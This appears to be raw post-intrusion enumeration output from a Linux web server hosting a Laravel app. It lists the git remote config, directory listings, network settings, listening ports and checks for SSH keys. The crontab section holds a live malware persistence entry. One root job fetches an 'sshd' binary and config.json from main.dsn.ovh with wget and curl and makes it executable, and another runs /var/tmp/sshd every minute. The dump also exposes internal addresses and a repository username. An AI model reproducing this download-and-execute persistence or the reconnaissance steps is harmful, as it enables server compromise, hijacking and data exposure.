=== /var/www/tlt/.git/ === . .. FETCH_HEAD HEAD ORIG_HEAD branches config description hooks index info logs objects packed-refs refs === /var/www/tlt/.git/HEAD === ref: refs/heads/sunstar_release_test === /var/www/tlt/.git/config === [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = https://sinbaoengineer@bitbucket.org/Sinbao/insst.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "hotfix-sunstar"] remote = origin merge = refs/heads/hotfix-sunstar [branch "sunstar_release_test"] remote = origin merge = refs/heads/sunstar_release_test === /home/nsst/.ssh/ === no /home/nsst/.ssh === /home/zerobyte/.ssh/ === no /home/zerobyte/.ssh === /home/forbidden/.ssh/ === no /home/forbidden/.ssh === /home/forbidden/.bash_history === null === /var/www/tlt/config/ contents === . .. app.php auth.php barcode.php broadcasting.php cache.php cartalyst.sentinel.php compile.php cors.php database.php dompdf.php excel.php filesystems.php image.php imagecache.php key mail.php orchestra pusher.php queue.php services.php session.php settings.php view.php === /var/www/tlt/ root listing === . .. .env .env.example .git .gitattributes .gitignore app artisan bootstrap composer.json composer.lock config database gulpfile.js nsst package.json phpspec.yml phpunit.xml public readme.md resources server.php sitemap.php storage tests vendor === /etc/hosts === 127.0.0.1 localhost 127.0.1.1 ubuntu # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters === /etc/network/interfaces or netplan === # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback # The primary network interface auto eth0 iface eth0 inet static address 192.168.10.6 netmask 255.255.240.0 gateway 192.168.10.1 dns-nameservers 8.8.8.8 8.8.4.4 === /proc/net/tcp (listening ports) === sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 0: 00000000:04D4 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 10346 1 0000000000000000 100 0 0 10 0 1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 9990 1 0000000000000000 100 0 0 10 0 2: 0100007F:08FC 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 10356 1 0000000000000000 100 0 0 10 0 3: 0100007F:08FD 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 10360 1 0000000000000000 100 0 0 10 0 4: 0100007F:08FE 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 10380 1 0000000000000000 100 0 0 10 0 5: 0100007F:08FF 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 10364 1 0000000000000000 100 0 0 10 0 6: 00000000:1C68 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 10345 1 0000000000000000 100 0 0 10 0 7: 00000000:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000 105 0 10422 1 0000000000000000 100 0 0 10 0 8: 00000000:D76F 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 10347 1 0000000000000000 100 0 0 10 0 === sudo -l (if any) === sudo: no tty present and no askpass program specified === crontab === # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # 0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json' * * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd' --- root crontab --- no crontab for www-data === /root/.ssh/ === no /root/.ssh